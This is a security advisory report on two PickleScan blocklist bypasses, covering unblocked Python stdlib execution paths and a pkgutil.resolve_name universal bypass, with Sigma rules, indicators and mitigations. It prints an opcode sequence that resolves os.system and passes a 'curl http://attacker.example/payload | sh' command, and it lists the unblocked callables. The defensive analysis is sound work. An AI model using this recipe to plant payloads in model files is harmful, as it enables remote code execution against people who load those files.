Executive Summary
What: Two critical vulnerabilities in PickleScan, a Python serialised-object security scanner used in ML pipelines and model-sharing platforms including HuggingFace Hub, render its blocklist-based protection entirely ineffective. The first advisory (GHSA-g38g-8gr9-h9xp, CVSS 9.8) identifies six Python standard library modules containing direct remote code execution paths that are absent from PickleScan's blocklist. The second advisory (GHSA-vvpj-8cmc-gx39, CVSS 10.0) describes a universal blocklist bypass via pkgutil.resolve_name that allows an attacker to dynamically resolve and invoke any callable in the Python runtime, regardless of blocklist contents.
So What: PickleScan is a commonly used scanner for evaluating serialised object safety before model loading, notably deployed by HuggingFace Hub for server-side scanning of uploaded models (GHSA-g38g-8gr9-h9xp). Organisations that rely on PickleScan as their sole defence against malicious serialised models have been operating with a false sense of security. Any model artefact marked "safe" by a version prior to 1.0.4 should be re-evaluated, and the earlier scan result should not be treated as sufficient validation on its own: an attacker could have embedded a payload using any of the unblocked modules or the universal bypass technique.
Now What: Upgrade PickleScan to version 1.0.4 or later immediately. Audit all models previously scanned and cleared by earlier versions. Consider defence-in-depth strategies that do not rely solely on blocklist-based scanning of serialised objects.
Risk Rating
| Dimension | Assessment | Rationale |
|---|---|---|
| Severity | Critical (CVSS 10.0 / 9.8) | Full remote code execution with no authentication or user interaction required (GHSA-vvpj-8cmc-gx39, GHSA-g38g-8gr9-h9xp) |
| Urgency | High | Fixed version available; exploitation requires only crafting a malicious serialised file |
| Scope | Wide | PickleScan is used for serialised object safety evaluation in ML pipelines and model-sharing platforms, including HuggingFace Hub (GHSA-g38g-8gr9-h9xp) |
| Confidence | High | Both advisories are vendor-confirmed with detailed technical descriptions of the bypass mechanisms |
| Business Impact | High | Arbitrary code execution on any system that loads a model artefact deemed "safe" by a vulnerable PickleScan version |
Affected Products
| Package | Registry | Vulnerable Versions | Fixed Version | Advisory |
|---|---|---|---|---|
| picklescan | PyPI | < 1.0.4 | 1.0.4 | GHSA-g38g-8gr9-h9xp, GHSA-vvpj-8cmc-gx39 |
Am I Affected?
- You use PickleScan (any version below 1.0.4) to validate serialised files before loading
- You load serialised model artefacts (.pkl, .pt, .pth, .bin) from external sources
- You operate an ML model registry or hub that uses PickleScan for ingestion scanning
- You have CI/CD pipelines that invoke PickleScan to gate model deployments
- You previously relied on PickleScan scan results to establish trust in third-party models
If any of the above apply, you are affected and should upgrade immediately.
Check your installed version:
pip show picklescan | grep Version
Abstract
PickleScan is a security scanner designed to detect dangerous function calls within Python serialised object files before they are deserialised. It operates on a blocklist model: it maintains a list of known-dangerous modules and callables (such as os.system, subprocess.Popen, and builtins.exec) and flags files that reference them. This research documents two distinct classes of failure in this approach, disclosed via GitHub Security Advisories.
The first class (GHSA-g38g-8gr9-h9xp) identifies six Python standard library modules that provide direct paths to operating system command execution but were absent from PickleScan's blocklist. These modules reach os.system() or subprocess.Popen through internal call chains that are not immediately obvious from their public API surface.
The second class (GHSA-vvpj-8cmc-gx39) is architecturally more severe: pkgutil.resolve_name can dynamically resolve any dotted Python name to its corresponding callable at runtime. Because pkgutil was not blocklisted, an attacker can use the serialisation opcode sequence STACK_GLOBAL + REDUCE to first resolve an arbitrary dangerous function (e.g., os:system) and then invoke it with attacker-controlled arguments -- bypassing the entire blocklist regardless of its contents. The advisory confirms eleven-plus RCE chains exploitable through this single bypass.
Together, these advisories demonstrate that blocklist-based scanning of serialised objects is structurally fragile: a single gap in coverage -- whether an omitted module or an unblocked meta-resolution function -- can negate the entire protection model.
Key Findings
- Six unblocked stdlib RCE modules. PickleScan versions prior to 1.0.4 did not blocklist six Python standard library modules that provide direct command execution capabilities, including uuid._get_command_stdout (which calls subprocess.Popen), _osx_support._read_output (which calls os.system()), and imaplib.IMAP4_stream (which calls subprocess.Popen(shell=True)) (GHSA-g38g-8gr9-h9xp).
- Universal blocklist bypass via pkgutil.resolve_name. The pkgutil.resolve_name function accepts a dotted-name string (e.g., os:system) and returns the corresponding Python callable. Because pkgutil was not blocklisted, an attacker can use serialisation opcodes to call resolve_name first to obtain any dangerous function, then invoke it in a second REDUCE operation, entirely circumventing the blocklist architecture (GHSA-vvpj-8cmc-gx39).
- Eleven-plus confirmed RCE chains. The pkgutil.resolve_name bypass is not limited to a single dangerous callable. The advisory confirms that eleven or more distinct remote code execution chains are reachable through this single bypass vector, making it a universal escape from blocklist-based scanning (GHSA-vvpj-8cmc-gx39).
- Blocklist architecture is structurally incomplete (assessment). The Python standard library contains hundreds of modules, many of which have internal functions that reach command execution through indirect call paths. A blocklist approach requires exhaustive enumeration of every such path, a task that these two advisories show to be inherently fragile and prone to omission.
- False-negative scanning results degrade trust. A "safe" result from a vulnerable PickleScan version should not be treated as sufficient validation on its own. Any organisation that used scan-pass results as a security gate should re-evaluate the integrity of all models that passed through that gate.
Attack Flow
+---------------------+
| Attacker crafts |
| malicious serialised|
| object using |
| unblocked module or |
| pkgutil resolve_name|
| bypass |
+----------+----------+
|
v
+---------------------+
| File uploaded to |
| model registry / |
| shared via |
| repository |
+----------+----------+
|
v
+---------------------+
| PickleScan < 1.0.4 |
| scans file |
| --> PASS (no |
| blocklist match) |
+----------+----------+
|
v
+---------------------+
| Model marked as |
| "safe" by scanner |
| and cleared for |
| deployment |
+----------+----------+
|
v
+---------------------+
| Downstream system |
| loads model via |
| deserialisation |
| (e.g. torch.load) |
+----------+----------+
|
v
+---------------------+
| Malicious payload |
| executes: |
| - os.system() |
| - subprocess.Popen |
| - arbitrary code |
| via resolve_name |
+----------+----------+
|
v
+---------------------+
| IMPACT: |
| Remote Code |
| Execution on |
| target system |
+---------------------+
MITRE ATLAS mapping: AML.T0010 (ML Supply Chain Compromise) -- attacker poisons a model artefact in the supply chain; AML.T0010.001 (AI Software) -- the compromised component is the security scanning tool itself.
Technical Details
7.1 Unblocked Standard Library Modules (GHSA-g38g-8gr9-h9xp)
PickleScan's blocklist architecture relies on matching the module and callable names referenced in serialisation opcodes against a curated deny list. The following six standard library modules were absent from this list, each providing a path to operating system command execution (GHSA-g38g-8gr9-h9xp):
uuid._get_command_stdout -- This internal function in the uuid module calls subprocess.Popen to execute shell commands as part of UUID generation on certain platforms. A serialised file can reference uuid._get_command_stdout directly via STACK_GLOBAL and REDUCE opcodes, passing attacker-controlled command strings.
_osx_support._read_output -- Used internally by Python's build system on macOS, this function calls os.system() to execute arbitrary commands. Despite being prefixed with an underscore (indicating internal use), it is fully importable and reachable via deserialisation.
_aix_support._read_cmd_output -- The AIX platform support module mirrors the macOS pattern, calling os.system() to read command output. Like _osx_support, it is importable and was not blocklisted.
_pyrepl.pager.pipe_pager -- Part of Python's REPL infrastructure, this function calls subprocess.Popen(shell=True) to pipe content through a system pager. The shell=True parameter makes it particularly dangerous, as it allows shell metacharacter injection.
imaplib.IMAP4_stream -- The IMAP client library's stream class calls subprocess.Popen(shell=True) to establish connections. An attacker can abuse this to execute arbitrary commands via the connection command string.
test.support.script_helper.assert_python_ok -- Part of Python's test infrastructure, this function spawns Python subprocesses. While typically excluded from production distributions, it remains importable in standard CPython installations.
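The six references above can be looked for directly in an opcode stream without ever loading the file. The following is a minimal sketch under stated assumptions, not PickleScan's implementation: it walks the stream with the standard library's pickletools.genops and reports globals that match the six module/callable pairs listed in this section. The names SUSPECT_GLOBALS, referenced_globals and suspect_references are hypothetical, and the STACK_GLOBAL handling assumes the module and attribute names are the two most recently pushed string constants, which a hand-crafted payload using memo lookups could violate.

```python
import pickle
import pickletools

# The six module/callable pairs named in GHSA-g38g-8gr9-h9xp (per this report).
SUSPECT_GLOBALS = {
    ("uuid", "_get_command_stdout"),
    ("_osx_support", "_read_output"),
    ("_aix_support", "_read_cmd_output"),
    ("_pyrepl.pager", "pipe_pager"),
    ("imaplib", "IMAP4_stream"),
    ("test.support.script_helper", "assert_python_ok"),
}


def referenced_globals(data: bytes) -> list[tuple[str, str]]:
    """List (module, name) pairs referenced by a pickle, without loading it."""
    found = []
    strings = []  # string constants pushed so far, in stream order
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name in ("GLOBAL", "INST"):
            # genops reports these as a single "module name" string.
            module, _, name = arg.partition(" ")
            found.append((module, name))
        elif opcode.name == "STACK_GLOBAL":
            # Assumption: the two latest string pushes are module and name.
            if len(strings) >= 2:
                found.append((strings[-2], strings[-1]))
        elif isinstance(arg, str):
            strings.append(arg)
    return found


def suspect_references(data: bytes) -> list[tuple[str, str]]:
    """Return only the references that match the six unblocked pairs."""
    return [ref for ref in referenced_globals(data) if ref in SUSPECT_GLOBALS]


# A protocol-0 stream that merely *references* the callable; it is never loaded.
sample = b"cuuid\n_get_command_stdout\n."
benign = pickle.dumps({"weights": [1.0, 2.0]}, protocol=4)

print(suspect_references(sample))
print(suspect_references(benign))
```

A check like this is only a stopgap for the specific names in the advisory; it inherits the same deny-list weakness discussed in this report and is best treated as one signal among several.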
7.2 Universal Bypass via pkgutil.resolve_name (GHSA-vvpj-8cmc-gx39)
The pkgutil.resolve_name bypass is architecturally distinct from the unblocked-module issue. Rather than exploiting gaps in the blocklist, it renders the entire blocklist concept irrelevant (GHSA-vvpj-8cmc-gx39).
The attack operates through a two-stage serialisation opcode sequence:
Stage 1 -- Resolve the dangerous callable:
STACK_GLOBAL pkgutil.resolve_name # Push resolve_name onto stack
MARK
SHORT_BINUNICODE "os:system" # Push the dotted-name string
TUPLE
REDUCE # Call resolve_name("os:system")
# Result: os.system function object
At this point, the virtual machine stack contains the os.system function object. PickleScan only inspects the STACK_GLOBAL and REDUCE opcodes for blocklisted module/callable pairs. It sees pkgutil.resolve_name -- which is not blocklisted -- and allows the operation.
Stage 2 -- Invoke the resolved callable:
# os.system is now on the stack from Stage 1
MARK
SHORT_BINUNICODE "curl http://attacker.example/payload | sh"
TUPLE
REDUCE # Call os.system("curl ...")
The second REDUCE calls whatever function was returned by Stage 1, with attacker-controlled arguments. The blocklist never sees os.system referenced in an opcode -- it was resolved dynamically at runtime.
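The reason name matching cannot see the final target can be illustrated outside of any serialised file. The sketch below is an illustration under stated assumptions: TOY_DENYLIST and name_based_scan_allows are hypothetical stand-ins for a name-matching scanner, and the resolved target is the harmless math:sqrt rather than anything dangerous. pkgutil.resolve_name itself is the real standard library function (available from Python 3.9).

```python
import math
import pkgutil

# Hypothetical, deliberately tiny deny list standing in for a real scanner's.
TOY_DENYLIST = {
    ("os", "system"),
    ("subprocess", "Popen"),
    ("builtins", "exec"),
}


def name_based_scan_allows(module: str, name: str) -> bool:
    """Allow any (module, name) reference that is not explicitly denied."""
    return (module, name) not in TOY_DENYLIST


# The only global a scanner would see in Stage 1 is pkgutil.resolve_name.
print(name_based_scan_allows("pkgutil", "resolve_name"))

# The actual target travels as an ordinary string argument, which a
# name-matching scanner never compares against its list.
target = "math:sqrt"  # benign stand-in for the string used in Stage 1
resolved = pkgutil.resolve_name(target)

print(resolved is math.sqrt)
print(resolved(16.0))
```

The point of the sketch is that the deny list is consulted once, for the resolver, while the callable that ends up on the stack is chosen by data the scanner treats as inert.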
7.3 CWE Classification
The advisories map to two complementary CWE weaknesses and one shared classification:
- CWE-184 (Incomplete List of Disallowed Inputs): The blocklist fails to enumerate all dangerous stdlib modules (GHSA-g38g-8gr9-h9xp).
- CWE-183 (Permissive List of Allowed Inputs): The blocklist implicitly allows any module not explicitly denied, including the meta-resolution function pkgutil.resolve_name (GHSA-vvpj-8cmc-gx39).
- CWE-693 (Protection Mechanism Failure): Both advisories share this classification, reflecting that the scanning mechanism fails to achieve its stated security objective.
7.4 Architectural Root Cause (Assessment)
In our assessment, the fundamental weakness is the use of a deny-list (blocklist) rather than an allow-list for a security-critical function. The Python standard library contains hundreds of modules, and any module with even an indirect path to command execution, file system manipulation, or network access can be weaponised in a serialised payload. Maintaining an exhaustive deny-list requires continuous updates, as each new Python release may introduce new modules or internal functions with execution capabilities.
The pkgutil.resolve_name bypass elevates this from a coverage problem to an architectural one: even a theoretically complete blocklist of dangerous endpoints is insufficient if the blocklist does not also cover every possible meta-programming function that can resolve names dynamically.
Confidence & Validation
| Criterion | Status | Detail |
|---|---|---|
| Vendor Confirmed | Yes | PickleScan maintainer published fix in version 1.0.4 |
| GHSA Published | Yes | GHSA-g38g-8gr9-h9xp and GHSA-vvpj-8cmc-gx39 both published |
| CVE Assigned | No | No CVE IDs have been assigned; these are GHSA-only advisories |
| CVSS Score | 9.8 / 10.0 | Per GHSA-g38g-8gr9-h9xp (9.8) and GHSA-vvpj-8cmc-gx39 (10.0) respectively |
| Fix Available | Yes | PickleScan 1.0.4 on PyPI |
| PoC Status | Conceptual | Opcode sequences described in advisories; no weaponised exploit published |
| Exploitation in the Wild | Not confirmed | No public reports of active exploitation at time of publication |
Assessment confidence: HIGH. Both advisories are published by the package maintainer with detailed technical descriptions. The vulnerable code paths are verifiable through source code inspection. The fix version is published and installable.
Detection Signatures (Formal Rules)
Sigma Rule 1: Unblocked Module Imports in Serialised Files
title: PickleScan Bypass - Unblocked Stdlib RCE Modules in Serialised File
id: raxe-sigma-015-001
status: experimental
description: >
  Detects serialised object files containing references to Python stdlib
  modules that provide RCE paths but were absent from PickleScan
  blocklist prior to version 1.0.4 (GHSA-g38g-8gr9-h9xp).
logsource:
  category: file_analysis
  product: picklescan
detection:
  selection_modules:
    opcode.module:
      - 'uuid'
      - '_osx_support'
      - '_aix_support'
      - '_pyrepl.pager'
      - 'imaplib'
      - 'test.support.script_helper'
  selection_callables:
    opcode.callable:
      - '_get_command_stdout'
      - '_read_output'
      - '_read_cmd_output'
      - 'pipe_pager'
      - 'IMAP4_stream'
      - 'assert_python_ok'
  condition: selection_modules and selection_callables
level: critical
tags:
  - attack.execution
  - attack.t1059
  - cwe.184
references:
  - https://github.com/advisories/GHSA-g38g-8gr9-h9xp
falsepositives:
  - Legitimate serialised files are unlikely to reference these internal modules
Sigma Rule 2: pkgutil.resolve_name in Opcode Stream
title: PickleScan Bypass - pkgutil.resolve_name Universal Blocklist Bypass
id: raxe-sigma-015-002
status: experimental
description: >
  Detects serialised object files containing references to
  pkgutil.resolve_name, which enables universal blocklist bypass by
  dynamically resolving arbitrary Python callables at deserialisation
  time (GHSA-vvpj-8cmc-gx39).
logsource:
  category: file_analysis
  product: picklescan
detection:
  selection:
    opcode.module: 'pkgutil'
    opcode.callable: 'resolve_name'
  condition: selection
level: critical
tags:
  - attack.execution
  - attack.defense_evasion
  - attack.t1059
  - cwe.183
references:
  - https://github.com/advisories/GHSA-vvpj-8cmc-gx39
falsepositives:
  - Extremely unlikely in legitimate serialised files; pkgutil.resolve_name has no valid use case in serialised model artefacts
Sigma Rule 3: Outdated PickleScan Version in CI/CD
title: Outdated PickleScan Version Detected in CI/CD Pipeline
id: raxe-sigma-015-003
status: experimental
description: >
  Detects CI/CD pipeline logs or dependency manifests indicating
  PickleScan versions prior to 1.0.4, which are vulnerable to
  blocklist bypass (GHSA-g38g-8gr9-h9xp, GHSA-vvpj-8cmc-gx39).
logsource:
  category: process_creation
  product: ci_cd
detection:
  selection_install:
    CommandLine|contains:
      - 'pip install picklescan'
      - 'pip install picklescan=='
  filter_safe_version:
    CommandLine|contains:
      - 'picklescan>=1.0.4'
      - 'picklescan==1.0.4'
      - 'picklescan==1.0.5'
      - 'picklescan==1.0.6'
      - 'picklescan==1.0.7'
      - 'picklescan==1.0.8'
      - 'picklescan==1.0.9'
      - 'picklescan==1.1'
  condition: selection_install and not filter_safe_version
level: high
tags:
  - attack.initial_access
  - attack.t1195.002
references:
  - https://github.com/advisories/GHSA-g38g-8gr9-h9xp
  - https://github.com/advisories/GHSA-vvpj-8cmc-gx39
falsepositives:
  - Pinned versions in legacy environments that have compensating controls
Detection & Mitigation
Immediate Actions
Upgrade PickleScan. Install version 1.0.4 or later from PyPI:
pip install --upgrade "picklescan>=1.0.4"
Verify the installed version:
pip show picklescan | grep Version
Audit previously scanned models. Any model artefact that was scanned and cleared by PickleScan versions prior to 1.0.4 should be re-evaluated, as prior scan results cannot be relied upon as sole validation. Re-scan all such artefacts with the updated version. Pay particular attention to models sourced from public repositories, community contributions, or third-party vendors.
Review CI/CD pipelines. Identify all pipelines that invoke PickleScan and ensure they reference the fixed version. Update version pins in requirements.txt, pyproject.toml, and Docker images.
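Reviewing version pins by hand across many repositories is error-prone, so a small audit script may help. The following is a rough sketch only: audit_line and audit_requirements are hypothetical helpers, the parser recognises just the bare name and simple == or >= pins in requirements.txt-style text, and it ignores extras, environment markers, pre-release suffixes and other specifier forms, all of which it reports conservatively as lacking a recognised pin.

```python
import re

FIXED = (1, 0, 4)  # first fixed release, per the advisories cited in this report

# Matches "picklescan", optionally followed by "==X.Y.Z" or ">=X.Y.Z".
_REQ = re.compile(
    r"^\s*picklescan(?![\w.\-])\s*(==|>=)?\s*([0-9]+(?:\.[0-9]+)*)?",
    re.IGNORECASE,
)


def release_tuple(text: str) -> tuple[int, ...]:
    """Turn '1.1' into (1, 1, 0) so it compares cleanly against FIXED."""
    nums = tuple(int(part) for part in text.split("."))
    return nums + (0,) * (3 - len(nums))


def audit_line(line: str):
    """Return a finding string for a risky picklescan requirement, else None."""
    match = _REQ.match(line)
    if match is None:
        return None  # not a picklescan requirement (or a comment line)
    operator, version = match.groups()
    if operator is None or version is None:
        return "no recognised ==/>= pin; consider 'picklescan>=1.0.4'"
    if release_tuple(version) < FIXED:
        return f"'{operator}{version}' permits a release below 1.0.4"
    return None


def audit_requirements(text: str) -> list[tuple[int, str]]:
    """Audit requirements-style text; return (line number, finding) pairs."""
    findings = []
    for number, line in enumerate(text.splitlines(), start=1):
        finding = audit_line(line)
        if finding is not None:
            findings.append((number, finding))
    return findings


example = "torch==2.1.0\npicklescan==1.0.3\n# picklescan==0.0.1\n"
for number, finding in audit_requirements(example):
    print(f"line {number}: {finding}")
```

The same function could be pointed at the contents of each requirements file in a repository; pyproject.toml and Docker images would need their own parsing, which this sketch does not attempt.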
Defence-in-Depth Recommendations
Do not rely solely on blocklist-based scanning. Blocklist approaches are structurally incomplete for serialised object analysis. Consider supplementary controls:
- Allowlist-based scanning: Instead of blocking known-dangerous callables, only permit a defined set of safe callables. This inverts the security model and eliminates the coverage gap problem.
- Sandboxed deserialisation: Load untrusted serialised files in isolated environments (containers, VMs, or seccomp-restricted processes) where command execution has no impact.
- Format migration: Where feasible, migrate from Python serialisation to safer formats such as SafeTensors, ONNX, or other formats that do not support arbitrary code execution during loading.
- Network segmentation: Ensure systems that load model artefacts cannot reach external networks, limiting the impact of reverse-shell or data-exfiltration payloads.
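The allowlist idea in the first bullet can be sketched with the standard library alone, following the "restricting globals" pattern of overriding pickle.Unpickler.find_class. This is a minimal illustration, not a drop-in control: ALLOWED_GLOBALS, AllowlistUnpickler and restricted_loads are hypothetical names, and the single allowed entry is a placeholder. A real model format would need its own carefully reviewed allowlist.

```python
import io
import pickle
from collections import OrderedDict

# Hypothetical allowlist: only these (module, name) pairs may be resolved.
ALLOWED_GLOBALS = {
    ("collections", "OrderedDict"),
}


class AllowlistUnpickler(pickle.Unpickler):
    """Unpickler that refuses any global not explicitly allowed."""

    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(
            f"global {module}.{name} is not on the allowlist"
        )


def restricted_loads(data: bytes):
    """Deserialise data, resolving only allowlisted globals."""
    return AllowlistUnpickler(io.BytesIO(data)).load()


# Plain containers and allowlisted classes load normally.
safe = pickle.dumps(OrderedDict(layer1=[0.1, 0.2]), protocol=4)
print(restricted_loads(safe))

# A stream that references pkgutil.resolve_name is rejected at lookup time,
# before any callable is returned to the pickle machinery.
try:
    restricted_loads(b"cpkgutil\nresolve_name\n.")
except pickle.UnpicklingError as exc:
    print("rejected:", exc)
```

Because unknown names are refused by default, a newly discovered resolver or stdlib helper does not need to be anticipated in advance. PyTorch's torch.load offers a weights_only=True option that applies a comparable restriction when loading checkpoints.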
Organisational Controls
- Establish a policy that all model artefacts from external sources undergo multi-layer validation, not solely PickleScan.
- Monitor for updates to PickleScan and similar scanning tools; blocklist-based tools will continue to require ongoing maintenance as new bypass techniques are discovered.
- Consider contributing to or adopting tools that use opcode-level analysis rather than simple name matching for serialised file inspection.
Indicators of Compromise
| Type | Indicator | Context |
|---|---|---|
| Behavioural | Serialised file references pkgutil.resolve_name in opcode stream | Universal blocklist bypass (GHSA-vvpj-8cmc-gx39); no legitimate reason for this callable in serialised model artefacts |
| Behavioural | Serialised file references uuid._get_command_stdout | Unblocked stdlib RCE module (GHSA-g38g-8gr9-h9xp); internal function with no valid serialisation use case |
| Behavioural | Serialised file references _osx_support._read_output | Unblocked stdlib RCE module (GHSA-g38g-8gr9-h9xp); macOS build-system internal with os.system() call |
| Behavioural | Serialised file references _aix_support._read_cmd_output | Unblocked stdlib RCE module (GHSA-g38g-8gr9-h9xp); AIX platform support internal with os.system() call |
| Behavioural | Serialised file references _pyrepl.pager.pipe_pager | Unblocked stdlib RCE module (GHSA-g38g-8gr9-h9xp); REPL pager with subprocess.Popen(shell=True) |
| Behavioural | Serialised file references imaplib.IMAP4_stream | Unblocked stdlib RCE module (GHSA-g38g-8gr9-h9xp); IMAP client with subprocess.Popen(shell=True) |
| Behavioural | Serialised file references test.support.script_helper | Unblocked stdlib RCE module (GHSA-g38g-8gr9-h9xp); test infrastructure subprocess spawning |
| File | Serialised files (.pkl, .pt, .pth, .bin) containing STACK_GLOBAL opcode followed by pkgutil module reference | Potential pkgutil.resolve_name bypass payload |
| Process | Unexpected child processes (sh, bash, curl, wget, nc) spawned by Python processes loading model artefacts | Post-exploitation activity following successful deserialisation RCE |
| Network | Outbound connections from model-loading infrastructure to unknown external hosts | Potential reverse shell or data exfiltration following deserialisation RCE |
Strategic Context
The Fragility of Blocklist-Based ML Security (RAXE Assessment)
These PickleScan advisories illustrate a broader pattern in ML supply chain security: the tools designed to protect the pipeline are themselves operating on architecturally fragile assumptions. In our assessment, blocklist-based scanning follows a well-understood anti-pattern in traditional application security -- web application firewalls (WAFs) that rely solely on regex-based blocklists have been routinely bypassed for decades. The ML security ecosystem is now encountering the same structural limitation.
Python Serialisation as a Persistent Attack Surface (RAXE Assessment)
Python's serialisation format remains prevalent in ML workflows (RAXE assessment), including as the default format for PyTorch model checkpoints. The deserialisation call is fundamentally an exec equivalent -- it can instantiate arbitrary objects and invoke arbitrary callables. As these advisories demonstrate, pre-load scanning alone cannot fully eliminate this risk as long as the format permits arbitrary code execution by design.
Safer Alternatives (RAXE Assessment)
Formats such as SafeTensors (developed by Hugging Face) and ONNX store tensor data without executable code paths, eliminating the deserialisation attack surface entirely. These PickleScan advisories reinforce the value of non-executable formats as a complementary control: where serialised object scanning is structurally fragile, format-level elimination of code execution removes the attack class altogether. The extent of industry migration to these formats is beyond the scope of this report.
Implications for ML Supply Chain Governance (RAXE Assessment)
Any organisation that treats a single blocklist-based scanner as a sufficient security control for model ingestion risks operating with a single point of failure. These advisories reinforce the need for layered model validation: format verification, allowlist-based opcode inspection, sandboxed loading, and provenance verification should all contribute to model trust decisions.
The CWE classifications assigned to these advisories -- CWE-184 (Incomplete List of Disallowed Inputs) and CWE-183 (Permissive List of Allowed Inputs) -- directly map to the allow-vs-deny list architectural debate. Security practitioners should treat these advisories as a case study in why deny-list approaches require continuous maintenance and are structurally inferior to allow-list models for security-critical functions.
References
- GHSA-g38g-8gr9-h9xp -- PickleScan: 7 Python stdlib modules with direct RCE not in blocklist (CVSS 9.8). https://github.com/advisories/GHSA-g38g-8gr9-h9xp
- GHSA-vvpj-8cmc-gx39 -- PickleScan: pkgutil.resolve_name universal blocklist bypass with eleven-plus confirmed RCE chains (CVSS 10.0). https://github.com/advisories/GHSA-vvpj-8cmc-gx39
- MITRE ATLAS AML.T0010 -- ML Supply Chain Compromise. https://atlas.mitre.org/techniques/AML.T0010
- MITRE ATLAS AML.T0010.001 -- ML Supply Chain Compromise: AI Software. https://atlas.mitre.org/techniques/AML.T0010.001
- CWE-184 -- Incomplete List of Disallowed Inputs. https://cwe.mitre.org/data/definitions/184.html
- CWE-183 -- Permissive List of Allowed Inputs. https://cwe.mitre.org/data/definitions/183.html
- CWE-693 -- Protection Mechanism Failure. https://cwe.mitre.org/data/definitions/693.html
- PickleScan on PyPI. https://pypi.org/project/picklescan/